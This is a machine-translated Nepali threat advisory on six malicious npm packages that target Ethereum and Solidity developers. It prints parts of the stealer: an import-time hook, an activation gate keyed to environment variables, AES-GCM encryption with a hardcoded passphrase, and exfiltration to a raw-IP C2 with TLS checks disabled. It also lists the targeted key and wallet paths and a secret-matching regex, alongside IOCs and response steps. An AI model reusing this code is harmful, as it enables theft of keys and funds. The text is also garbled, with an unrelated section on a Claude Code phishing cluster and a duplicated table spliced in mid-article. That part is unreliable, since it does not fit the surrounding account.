TL; ड
मे ६, २०२६ मा, एकल npm प्रकाशक, namikazesarada010206, Ethereum, Solidity, र DeFi विकासकर्ता इकोसिस्टमलाई लक्षित गर्दै छ वटा दुर्भावनापूर्ण प्याकेजहरू धकेलियो।
प्याकेजहरू, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, र web3-utils-core, लोकप्रिय Web3 टुलिङका लागि सहायक पुस्तकालयहरू जस्तो देखिने गरी डिजाइन गरिएका प्रशंसनीय नामहरू प्रयोग गरियो।
सबै छवटा प्याकेजहरूमा उस्तै थियो telemetry.js फाइल। फाइल SHA-256 सहित, क्लस्टरभरि बाइट-समान थियो:
मालवेयर स्थापनाको समयमा कार्यान्वयन हुँदैन। त्यहाँ कुनै preinstall or postinstall हुक। बरु, प्याकेज आयात गर्दा यो सक्रिय हुन्छ require().
त्यो विवरण महत्त्वपूर्ण छ।
इम्प्लान्टले विकासकर्ताले वास्तवमा प्याकेज प्रयोग नगरेसम्म पर्खन्छ। त्यसपछि यसले कार्यस्थान वास्तविक इथरियम / सोलिडिटी विकास वातावरण जस्तो देखिन्छ कि छैन भनेर जाँच गर्छ। यसले अल्केमी वा इन्फुरा कुञ्जीहरू, निजी कुञ्जीहरू, निमोनिक्स, डिप्लोयर कुञ्जीहरू, वा स्थानीय फाउन्ड्री निर्देशिका खोज्छ।
यदि होस्ट मिल्छ भने, चोरले SSH निजी कुञ्जीहरू, फाउन्ड्री / गेथ / ब्राउनी वालेट किस्टोरहरू सङ्कलन गर्दछ, .env* फाइलहरू, र संवेदनशील वातावरण चरहरू। यसले हार्डकोड गरिएको पासफ्रेज प्रयोग गरेर AES-256-GCM सँग बन्डललाई इन्क्रिप्ट गर्छ र TLS प्रमाणीकरण असक्षम पारेर कच्चा IPv4 C2 अन्त्य बिन्दुमा एक्सफिल्टरेट गर्छ।
Xygeni को मालवेयर अर्ली वार्निंग (MEW) प्रणालीले सबै छ प्याकेजहरूलाई दुर्भावनापूर्ण रूपमा पुष्टि गर्यो। npm रजिस्ट्री टेकडाउन रिपोर्ट बन्डल विचाराधीन छ।
क्लस्टर: छ प्याकेजहरू, एक प्रकाशक
प्रकाशक खाता namikazesarada010206 अप्रमाणित Gmail ठेगानामा लिङ्क गरिएको थियो namikazesarada010206@gmail.com.
अभियान मे ६, २०२६ मा एक-दिने प्रकाशनको रूपमा देखा पर्यो। सबै छ प्याकेजहरूलाई यस रूपमा संस्करण गरिएको थियो 1.0.0, शून्य रनटाइम निर्भरताहरू थिए, र केवल तीन फाइलहरू पठाइए:
package.json index.js telemetry.js तिनीहरूले उही स्रोत भण्डार पनि घोषणा गरे:
https://github.com/harunosakura030303-maker/evmchain-config पहिलो तीन प्याकेजहरू पहिलो प्रकाशनमा MEW स्क्यानरहरूले समातेका थिए। बाँकी तीनलाई प्रकाशकको npm प्रोफाइलको विश्लेषक समीक्षा पछि जबरजस्ती फ्ल्याग गरिएको थियो। एक पटक उही बाइट-समान telemetry.js क्लस्टरभरि पुष्टि भए पनि, स्थिरताका कारण तिनीहरूलाई दुर्भावनापूर्ण रूपमा बन्द गरिएको थियो।
| प्याकेज | संस्करण | npm प्रकाशित | MEW टिकट | प्रमाणित |
|---|---|---|---|---|
| भिएम-कोर | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | दुर्भावनापूर्ण |
| viem-utils-core का थप वस्तुहरू | 1.0.0 | 2026-05-06 | #51050 | दुर्भावनापूर्ण |
| हार्डह्याट-कोर-उपयोगिताहरू | 1.0.0 | 2026-05-06 | #51051 | दुर्भावनापूर्ण |
| ईभीएम-उपयोगिताहरू | 1.0.0 | 2026-05-06 | #51069 | दुर्भावनापूर्ण, स्थिरता द्वारा |
| फाउन्ड्री-उपयोगिताहरू | 1.0.0 | 2026-05-06 | #51071 | दुर्भावनापूर्ण, स्थिरता द्वारा |
| web3-utils-core मा जानुहोस् | 1.0.0 | 2026-05-06 | #51070 | दुर्भावनापूर्ण, स्थिरता द्वारा |
नामकरण रणनीति सरल तर प्रभावकारी छ।
यी प्याकेजहरूले सटीक अपस्ट्रीम नामहरूको प्रतिरूपण गर्दैनन्। बरु, तिनीहरूले प्रशंसनीय "उपयोगिता" प्रत्ययहरू प्रयोग गर्छन् जस्तै -core, -utils, र -utils-core। यसले तिनीहरूलाई Web3 टूलिङ नजिकै हेर्ने अपेक्षा गर्न सक्ने साथी पुस्तकालयहरू जस्तो देखिन्छ।
| दुर्भावनापूर्ण प्याकेज | वैध लक्ष्य |
|---|---|
| भिएम-कोर | viem, एक लोकप्रिय Ethereum TypeScript क्लाइन्ट |
| viem-utils-core का थप वस्तुहरू | भिएम |
| हार्डह्याट-कोर-उपयोगिताहरू | हार्डह्याट, एक मुख्यधारा सोलिडिटी विकास वातावरण |
| ईभीएम-उपयोगिताहरू | जेनेरिक EVM टूलिंग नेमस्पेस |
| फाउन्ड्री-उपयोगिताहरू | फाउन्ड्री, एक सोलिडिटी टूलचेन |
| web3-utils-core मा जानुहोस् | web3-utils, Web3.js सहयोगीहरू |
यो "पूरक प्याकेज" ढाँचा हो: "म वास्तविक प्याकेज हुँ" होइन, तर "म वास्तविक प्याकेज वरिपरि एक उचित सहयोगी जस्तो देखिन्छु।"
DeFi विकासकर्ताहरू द्रुत गतिमा अघि बढिरहेका छन् भने, त्यो जोखिम सिर्जना गर्न पर्याप्त छ।
प्याकेज आयात गर्दा के हुन्छ?
आक्रमण श्रृंखला सानो, जानाजानी गरिएको, र क्रिप्टो-विकास वातावरणमा केन्द्रित छ।
कुनै स्थापना हुक छैन। बरु, प्रत्येक प्याकेजमा एउटा समावेश छ index.js जसले स्टब कार्यक्षमता निर्यात गर्छ र त्यसपछि मालिसियस टेलिमेट्री मोड्युल लोड गर्छ।
require('./telemetry').init(); यसको अर्थ मालवेयर पहिलो आयातमा सक्रिय हुन्छ।
त्यो आक्रमणकारीको लागि सञ्चालनको रूपमा उपयोगी छ। धेरै स्क्यानरहरू र स्यान्डबक्सहरू स्थापना-समय व्यवहारमा केन्द्रित हुन्छन्। यो प्याकेजले विकासकर्ता, निर्माण स्क्रिप्ट, परीक्षण सुइट, वा रनटाइम मार्गद्वारा वास्तवमा प्रयोग नभएसम्म पर्खन्छ।
सक्रियता गेट: वास्तविक Web3 विकासकर्ता कार्यस्थानहरूमा मात्र आगो लाग्छ
इम्प्लान्टको सबैभन्दा महत्त्वपूर्ण भाग सक्रियता गेट हो।
मालवेयरले सामान्यतया Ethereum / Solidity विकासकर्ता मेसिनहरूमा पाइने वातावरण चरहरूको जाँच गर्दछ:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); यसले फाउन्ड्री स्थापना भएको देखिन्छ कि छैन भनेर पनि जाँच गर्छ:
fs.existsSync(path.join(os.homedir(), '.foundry')) यदि कुनै पनि अवस्था सत्य छैन भने, प्रकार्य फर्कन्छ र केही गर्दैन।
यसले सामान्य विश्लेषण वातावरणमा प्याकेजलाई शान्त बनाउँछ। फाउन्ड्री, अल्केमी कुञ्जीहरू, इन्फुरा कुञ्जीहरू, निजी कुञ्जीहरू, वा मेमोनिक्स बिनाको स्यान्डबक्सले हानिरहित देखिने आयात देख्न सक्छ।
मिल्दो होस्टमा, मालवेयरले सङ्कलन गर्नु अघि ६० देखि ९० सेकेन्ड पर्खन्छ:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); ढिलाइले आयात र निष्कासन बीचको स्पष्ट सम्बन्धलाई कम गर्छ। .unref() यदि प्याकेज छोटो अवधिको स्क्रिप्टमा आयात गरिएको थियो भने call ले होस्ट प्रक्रियालाई सामान्य रूपमा बाहिर निस्कन दिन्छ।
यो कोलाहलपूर्ण तोडफोड र हडप्ने व्यवहार होइन। यो विकासकर्ता वातावरण चोरी गर्न लायक नभएसम्म दौडनबाट बच्नको लागि डिजाइन गरिएको लक्षित चोरी हो।
चोरले के सङ्कलन गर्छ
एक्टिभेसन गेट पास भएपछि, मालवेयरले Web3 विकासमा सबैभन्दा महत्त्वपूर्ण स्रोतहरूबाट सङ्कलन गर्दछ: निजी कुञ्जीहरू, वालेट कीस्टोरहरू, डिप्लोयमेन्ट क्रेडेन्सियलहरू, क्लाउड गोप्यहरू, npm टोकनहरू, र स्थानीय परियोजना कन्फिगरेसन।
| मुहान | के सङ्कलन गरिन्छ |
|---|---|
| process.env प्रयोग गर्न सकिन्छ | कुनै पनि चर मिल्दो /टोकन|गोप्य|कुञ्जी|पास|प्रमाणीकरण|निजी|बीज|स्मरणात्मक|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | पूर्ण फाइल सामग्री सहित PRIVATE KEY वा BEGIN OPENSSH भएका फाइलहरू |
| ~/.फाउन्ड्री/किस्टोरहरू/* | फाउन्ड्री वालेट किस्टोर फाइलहरू |
| ~/.इथेरियम/किस्टोर/* | गेथ वालेट किस्टोर फाइलहरू |
| ~/.ब्राउनी/खाताहरू/* | ब्राउनी वालेट किस्टोर फाइलहरू |
| ${cwd}/.env | पूर्ण फाइल सामग्री |
| ${cwd}/.env.local | पूर्ण फाइल सामग्री |
| ${cwd}/.env.उत्पादन | पूर्ण फाइल सामग्री |
| ${cwd}/.env.विकास | पूर्ण फाइल सामग्री |
| ओएस.होस्टनाम() | होस्ट मेटाडेटा |
| क्रिप्टो.यादृच्छिकUUID() | पीडित/सत्र पहिचानकर्ता |
| मिति.अब() | सङ्कलन टाइमस्ट्याम्प |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA टोकनहरू हुन्:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 हामीले टेलिमेट्री अपरेटरको आफ्नै एनालिटिक्स थियो वा छुट्टै मुद्रीकरण गरिएको च्यानल थियो भनेर पुष्टि गर्न सकेनौं। हामीले जाँच गरेका दुवै नमूनाहरूमा ATTA टोकनहरू समान छन्।
क्लस्टर बी: हेइबाई
claude.hk OAuth फिसिङ + ANTHROPIC_BASE_URL अपहरण
अप्रिल १ को नमुना अभियानको सबैभन्दा क्रूर, पहिलेको अंग हो।
heibai:2.1.88-claude.hk-4 द्वारा प्रकाशित भएको थियो wuguoqiangvip28, जुन ७, २०२५ मा सिर्जना गरिएको खाता। प्याकेजले स्पष्ट रूपमा वैध विरुद्धको संस्करण प्रस्तुत गर्यो 2.1.88 मानवजन्य रिलिज।
यसले CA-cert MITM सँग कुनै समस्या गर्दैन। बरु, यसले OAuth अन्त्य बिन्दुको बारेमा प्रयोगकर्तालाई झूट बोल्छ।
लीक भएको क्लाउड कोड स्रोतको माथि रहेको दुर्भावनापूर्ण थपहरू समावेश छन्:
| मुहान | के सङ्कलन गरिन्छ |
|---|---|
| process.env प्रयोग गर्न सकिन्छ | कुनै पनि चर मिल्दो /टोकन|गोप्य|कुञ्जी|पास|प्रमाणीकरण|निजी|बीज|स्मरणात्मक|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | पूर्ण फाइल सामग्री सहित PRIVATE KEY वा BEGIN OPENSSH भएका फाइलहरू |
| ~/.फाउन्ड्री/किस्टोरहरू/* | फाउन्ड्री वालेट किस्टोर फाइलहरू |
| ~/.इथेरियम/किस्टोर/* | गेथ वालेट किस्टोर फाइलहरू |
| ~/.ब्राउनी/खाताहरू/* | ब्राउनी वालेट किस्टोर फाइलहरू |
| ${cwd}/.env | पूर्ण फाइल सामग्री |
| ${cwd}/.env.local | पूर्ण फाइल सामग्री |
| ${cwd}/.env.उत्पादन | पूर्ण फाइल सामग्री |
| ${cwd}/.env.विकास | पूर्ण फाइल सामग्री |
| ओएस.होस्टनाम() | होस्ट मेटाडेटा |
| क्रिप्टो.यादृच्छिकUUID() | पीडित/सत्र पहिचानकर्ता |
| मिति.अब() | सङ्कलन टाइमस्ट्याम्प |
लक्षित सूची अत्यन्त विशिष्ट छ। यो सामान्य ब्राउजर चोरी वा व्यापक प्रमाण स्क्र्यापिङ होइन। यो Ethereum अनुप्रयोगहरू निर्माण, परीक्षण, तैनाथ, वा सञ्चालन गर्ने विकासकर्ताहरूको लागि लक्षित छ।
फाउन्ड्री, गेथ, र ब्राउनी किस्टोरहरूको समावेश विशेष गरी महत्त्वपूर्ण छ। यी फाइलहरूले वालेट वा डिप्लोयमेन्ट पहिचानहरूमा प्रत्यक्ष पहुँच प्रतिनिधित्व गर्न सक्छन्। यदि आक्रमणकारीले तिनीहरूलाई पासवर्ड, निमोनिक्स, वा वातावरणीय गोप्यहरूसँग जोड्न सक्छ भने, तिनीहरूले कोष सार्न, डिप्लोयर्सको प्रतिरूपण गर्न, वा स्मार्ट अनुबंध सञ्चालनहरू सम्झौता गर्न सक्षम हुन सक्छन्।
एक्सफिल्ट्रेसन अघि इन्क्रिप्शन
मालवेयरले सङ्कलन गरिएको डेटा पठाउनु अघि इन्क्रिप्ट गर्छ।
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); हार्डकोड गरिएको पासफ्रेज यो हो:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d अन्तिम पेलोड JSON को रूपमा बेरिएको छ:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} इन्क्रिप्शनले मालवेयरलाई आफैंमा अझ उन्नत बनाउँदैन। यद्यपि, यसले नेटवर्क निरीक्षणलाई अझ कठिन बनाउँछ। बाहिर निस्कने डिफेन्डरले JSON पेलोड देख्नेछ, तर चोरी भएका कुञ्जीहरू, वालेट फाइलहरू, वा .env हार्डकोड गरिएको पासफ्रेज र डिक्रिप्शन तर्क बिना सामग्रीहरू।
कच्चा IPv4 C2 मा एक्सफिल्ट्रेसन
एक्सफिल्ट्रेसन मार्ग हार्डकोड गरिएको छ:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); मालवेयरले निम्नमा डेटा पठाउँछ:
https://76.13.37.80:8443/api/v1/telemetry दुई विवरणहरू स्पष्ट छन्।
पहिलो, C2 डोमेन नभई कच्चा IPv4 ठेगाना हो। यसले डोमेन दर्ताको आवश्यकतालाई हटाउँछ र केही डोमेन-आधारित पत्ता लगाउनबाट बचाउँछ।
दोस्रो, TLS प्रमाणीकरण निम्न अवस्थामा असक्षम पारिएको छ:
rejectUnauthorized: false यसले मालवेयरलाई स्व-हस्ताक्षरित प्रमाणपत्रहरू सहित कुनै पनि प्रमाणपत्र स्वीकार गर्न अनुमति दिन्छ। अर्को शब्दमा, आक्रमणकारीले वैध सार्वजनिक प्रमाणपत्रको आवश्यकता बिना नै इन्क्रिप्टेड ट्रान्सपोर्ट प्राप्त गर्दछ।
त्यहाँ कुनै पुन: प्रयास तर्क छैन र कुनै फलब्याक होस्ट छैन। त्रुटिहरू चुपचाप निलिन्छन्। यदि C2 अफलाइन छ वा पहुँचयोग्य छैन भने यसले प्याकेजलाई शान्त राख्छ।
यो अभियान किन महत्त्वपूर्ण छ
विकासकर्ताहरूलाई लक्षित धेरैजसो दुर्भावनापूर्ण npm प्याकेजहरू व्यापक प्रमाणहरू पछ्याउँछन्: npm टोकनहरू, AWS कुञ्जीहरू, GitHub टोकनहरू, वा .npmrc फाइलहरू।
यो अभियानले लक्ष्यलाई साँघुरो बनाउँछ।
यसले मेसिन इथरियम वा सोलिडिटी विकासकर्ताको हो भन्ने संकेतहरू खोज्छ। त्यसपछि यसले त्यो वातावरणमा महत्त्वपूर्ण हुने सम्पत्तिहरू ठ्याक्कै तान्छ: वालेट किस्टोरहरू, निजी कुञ्जीहरू, निमोनिक्स, डिप्लोयर कुञ्जीहरू, .env फाइलहरू, र SSH कुञ्जीहरू।
यसले अभियानलाई सामान्य npm चोर भन्दा Web3 टोलीहरूको लागि बढी खतरनाक बनाउँछ।
सफल संक्रमणले निम्न कुराहरू प्रकट गर्न सक्छ:
- डिप्लोयमेन्ट वालेटहरू
- स्मार्ट सम्झौता प्रशासक कुञ्जीहरू
- RPC प्रदायक कुञ्जीहरू
- क्लाउड डिप्लोयमेन्ट प्रमाणपत्रहरू
- npm प्रकाशन टोकनहरू
- विकासकर्ता वा निर्माण पूर्वाधारमा SSH पहुँच
- परियोजना गोप्यहरू भण्डारण गरिएका छन्
.envफाइलहरू - फाउन्ड्री, गेथ, वा ब्राउनीको लागि वालेट किस्टोरहरू
प्याकेज नामहरूले स्पष्ट सामाजिक इन्जिनियरिङ पनि देखाउँछन्। तिनीहरूले परिचित उपकरण नामहरू मार्फत Web3 विकासकर्ता इकोसिस्टमलाई लक्षित गर्छन्: viem, hardhat, foundry, evm, र web3.
अभिनेताले वास्तविक परियोजनाहरूसँग सम्झौता गर्नुपर्दैन। उनीहरूलाई केवल एक विकासकर्ता चाहिन्छ जसले उचित साथी प्याकेज जस्तो देखिने कुरा स्थापना गर्दछ।
सम्झौता र पत्ता लगाउने सूचकहरू
| प्याकेजहरू र प्रकाशक | |
|---|---|
| क्षेत्र | मूल्य |
| npm प्रकाशक | नामिकाजेसरदा०१०२०६ |
| प्रकाशकको इमेल | namikazesarada010206@gmail.com मा सम्पर्क गर्नुहोस् |
| इमेल प्रमाणित | होइन |
| SCM प्रमाणित | होइन |
| प्रतिष्ठा स्कोर | 1.0 |
| प्याकेजहरू | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| संस्करण | सबै 1.0.0 |
| स्रोत भण्डार | https://github.com/harunosakura030303-maker/evmchain-config |
| दुर्भावनापूर्ण पुष्टि भयो | सबै छ प्याकेजहरू |
| नेटवर्क | |
|---|---|
| प्रकार | मूल्य |
| C2 अन्त्यबिन्दु | https://76.13.37.80:8443/api/v1/telemetry |
| C2 आईपी | 76.13.37.80 |
| C2 पोर्ट | 8443/tcp |
| TLS व्यवहार | अस्वीकार गर्नुहोस्अनधिकृत: गलत |
| पेलोड स्किमा | {"v":2,"iv": "घ": "ट": } |
| फाइलहरू र ह्यासहरू | |
|---|---|
| प्रकार | मूल्य |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| प्याकेज लेआउट | package.json, index.js, telemetry.js |
| फाइल गणना | 3 |
| अनुमानित कुल आकार | 3.4 KB |
सक्रियता संकेतहरू
मालवेयरले यी वातावरण चरहरूको जाँच गर्दछ:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY यसले निम्न कुराहरूको पनि जाँच गर्छ:
~/.foundry/ लक्षित होस्ट पथहरू
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development सङ्कलन रेजेक्स
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i पत्ता लगाउने नोटहरू
पूर्ण व्यवहारिक विश्लेषणको आवश्यकता बिना नै धेरै नियमहरूले यो अभियानलाई समात्छन्।
पहिले, छ वटा दुर्भावनापूर्ण प्याकेज नामहरूको लागि लकफाइलहरू स्क्यान गर्नुहोस्:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core कुनै पनि मिल्दोजुल्दो package-lock.json, yarn.lock, pnpm-lock.yamlवा node_modules इतिहासलाई गम्भीर घटनाको रूपमा लिनुपर्छ।
दोस्रो, वालेट किस्टोर मार्गहरू पढ्ने Node.js प्रक्रियाहरूको लागि मनिटर:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ यो सहायक निर्भरताको रूपमा आयात गरिएको प्याकेजको लागि विरलै वैध व्यवहार हो। आउटबाउन्ड नेटवर्क गतिविधि पछि यो विशेष गरी शंकास्पद हुन्छ।
तेस्रो, HTTPS जडानहरूमा ब्लक वा अलर्ट गर्नुहोस्:
76.13.37.80:8443 विशेष गरी जब अनुरोध मार्ग यो हो:
/api/v1/telemetry चौथो, यी विशेषताहरू संयोजन गर्ने npm प्याकेजहरू खोज्नुहोस्:
- नयाँ वा कम प्रतिष्ठा भएका प्रकाशक
- अप्रमाणित जीमेल खाता
- Web3-सम्बन्धित प्याकेज नाम
- कुनै अर्थपूर्ण भण्डार इतिहास छैन
- सानो प्याकेज लेआउट
index.jsजसले टेलिमेट्री वा सहयोगी फाइल लोड गर्छ- कुनै रनटाइम निर्भरता छैन
- संवेदनशील वातावरण-चर संग्रह
- वालेट किस्टोर पहुँच
यो ढाँचा एकल IOC भन्दा बढी उपयोगी छ किनभने अर्को प्याकेजले IP ठेगाना परिवर्तन गर्न सक्छ तर उही लक्ष्यीकरण तर्क राख्न सक्छ।
सम्झौता प्रतिक्रिया चेकलिस्ट
यदि कुनै विकासकर्ताले छवटा प्याकेजहरू मध्ये एउटा प्रयोग गरेको छ र तिनीहरूको वातावरण सक्रियता गेटसँग मेल खान्छ भने, कार्यस्थानलाई सम्झौता भएको मान्नुहोस्।
त्यसमा फाउन्ड्री जडान गरिएका मेसिनहरू, वातावरणमा अल्केमी वा इन्फुरा कुञ्जीहरू, निजी कुञ्जीहरू, निमोनिक्स, वा डिप्लोयर कुञ्जीहरू समावेश छन्।
सिफारिस गरिएको प्रतिक्रिया:
- नेटवर्कबाट होस्ट विच्छेद गर्नुहोस्।
- संरक्षण गर्नुहोस्
node_modules, लकफाइलहरू, शेल इतिहास, र फोरेन्सिकका लागि सान्दर्भिक लगहरू। - प्रत्येक SSH किपेयरलाई तल घुमाउनुहोस्
~/.ssh/. - प्रत्येक किस्टोरको लागि वालेट कुञ्जीहरू घुमाउनुहोस्
~/.foundry,~/.ethereum, र~/.brownie. - नयाँ वालेटमा रकम सार्नुहोस्।
- भण्डारण गरिएका हरेक गोप्य कुरा घुमाउनुहोस्
.env*विकासकर्ताले काम गर्ने भण्डारहरूमा रहेका फाइलहरू। - AWS कुञ्जीहरू, npm टोकनहरू, डिप्लोय टोकनहरू, API कुञ्जीहरू, निजी कुञ्जीहरू, बीजहरू, र मेमोनिक्स सहित सङ्कलन रेजेक्ससँग मिल्ने वातावरणीय रहस्यहरू घुमाउनुहोस्।
- प्याकेज पहिलो पटक स्थापना भएदेखि अडिट क्लाउड, एनपीएम, गिटहब, आरपीसी प्रदायक, र ब्लकचेन गतिविधि।
- पुन: प्रयोग गर्नु अघि कार्यस्थानको पुन: छवि बनाउनुहोस्।
रक्षकहरूले के लैजानुपर्छ
यो अभियानले उच्च-मूल्य विकासकर्ता इकोसिस्टम वरिपरि npm टाइपोस्क्वाटिंग कसरी विकसित हुँदैछ भनेर देखाउँछ।
अभिनेतालाई दृढता चाहिँदैनथ्यो। उनीहरूलाई अस्पष्टता चाहिँदैनथ्यो। उनीहरूलाई स्थापना-समय कार्यान्वयन पनि चाहिँदैनथ्यो।
बरु, तिनीहरूले तीनवटा कुरामा भर परे:
- प्रशंसनीय Web3 प्याकेज नामहरू
- वास्तविक क्रिप्टो-विकास मेसिनहरूमा मात्र सक्रियता
- इथरियम विकासकर्ताहरूको लागि सबैभन्दा महत्त्वपूर्ण फाइलहरू र गोप्य कुराहरूको प्रत्यक्ष चोरी
यसले गर्दा अभियानलाई व्यापक स्क्यानिङमा छुटाउन सजिलो हुन्छ र सही वातावरणमा अवतरण गर्दा खतरनाक हुन्छ।
Web3 टोलीहरूको लागि, पाठ स्पष्ट छ: निर्भरता नामहरूलाई तपाईंको खतरा मोडेलको भागको रूपमा व्यवहार गर्नुहोस्। हानिरहित सहयोगी जस्तो देखिने प्याकेज अझै पनि वालेट सम्झौताको सबैभन्दा छोटो बाटो बन्न सक्छ।
npm रजिस्ट्रीमा रिपोर्ट गरियो। प्रकाशक खाता र प्याकेजहरू हटाइएपछि हामी यो पोस्ट अपडेट गर्नेछौं।




